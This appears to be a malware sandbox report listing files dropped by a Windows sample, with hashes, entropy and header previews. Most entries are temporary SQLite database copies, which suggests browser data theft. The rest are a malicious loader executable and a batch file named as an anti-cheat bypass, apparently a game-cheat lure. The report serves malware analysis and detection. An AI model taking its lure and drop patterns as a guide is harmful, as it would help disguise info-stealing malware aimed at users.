Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\FcPQVm4LOX

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Fj3HlbMqmv

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GWpPuWTUON

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GYKNKydMZ8

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Gi4cyICSRr

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\GtOK3L31Vh

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HCTotSIKRY

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HIw9ZKtCnl

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HcozAVOs7M

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\HpyhWocJAP

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IJcoXokAzT

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IPvPagoFUU

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\IwuzJsuPKz

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\J0iqErTJgv

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JHcPkVjNJi

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jf4HhOdGbm

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Jfcf3CMvj9

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JvIpv0YHOB

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\JwKr72D0r7

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\KOf5PyGCEv

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Khdn6nWHcE

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\L94XKEd9GE

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LHRxkLNbWb

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\LI0dF8BeSP

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe

Download File

Process:	C:\Users\user\Desktop\bFZYRLnRIz.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1257951
Entropy (8bit):	7.697708560370098
Encrypted:	false
SSDEEP:	24576:yuDXTIGaPhEYzUzA0bJw8roCiqKmJTk4HepZeDkiL5RWxgwhLUM09pKV:1Djlabwz9G8rwqze4HepAz5RXwlP0aV
MD5:	43AF303E1F32CE8C477ABBFB07887EA2
SHA1:	C69B0F73B6219D05CEC8258C445AF5F39D3313C9
SHA-256:	37493D6B5FD0F186BB2E70EDFAFE91F28B43938293965461A7EEFB5CCA4C36BF
SHA-512:	68D0ED901C7AA8BC6DE3F8D83FEA9C0A362D6582EA54B052941F9A02C25B9BB32B096BD8EFE73506985AD7B94EEA0757A35CB3924E845D8F69216CE999327774
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 71%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.2.`.\.`.\.`.\..y..h.\..y....\..y..m.\.....b.\...X.r.\..._.j.\...Y.Y.\.i..i.\.i..b.\.i..g.\.`.].C.\..Y.R.\..\.a.\...a.\..^.a.\.Rich`.\.........PE..d...#.@f.........."....!.h...j.................@..........................................`.............................................4......P...............l0..............p....6..T....................7..(......@....................... ....................text...ng.......h.................. ..`.rdata...(.......*...l..............@..@.data...\...........................@....pdata..l0.......2..................@..@.didat..`...........................@..._RDATA..\...........................@..@.rsrc...............................@..@.reloc..p...........................@..B........................................................................................................................................

C:\Users\user\AppData\Local\Temp\Loader\AntiCheatBypass.bat

Download File

Process:	C:\Users\user\Desktop\bFZYRLnRIz.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (4641), with no line terminators
Category:	dropped
Size (bytes):	9285
Entropy (8bit):	4.62156305633747
Encrypted:	false
SSDEEP:	192:HTHycqfAJFHWYA0DN8Mie1qeqKnJTeg+pH/LwJRqr3zvIyqJNUT1VAgmr8qUIz+8:zHycqfAJFHWYA0DN8Mie1qeqKnJTeg+2
MD5:	4C44AAB923A5C7719850E5138ECB64C0
SHA1:	9634BB1DB8ED400B033225A849C88C7908D61B3D
SHA-256:	63047A792BDE6EFB6AAB1A6DBB178F55B6AE86317D75CB4470E51DD0EF76BE2E
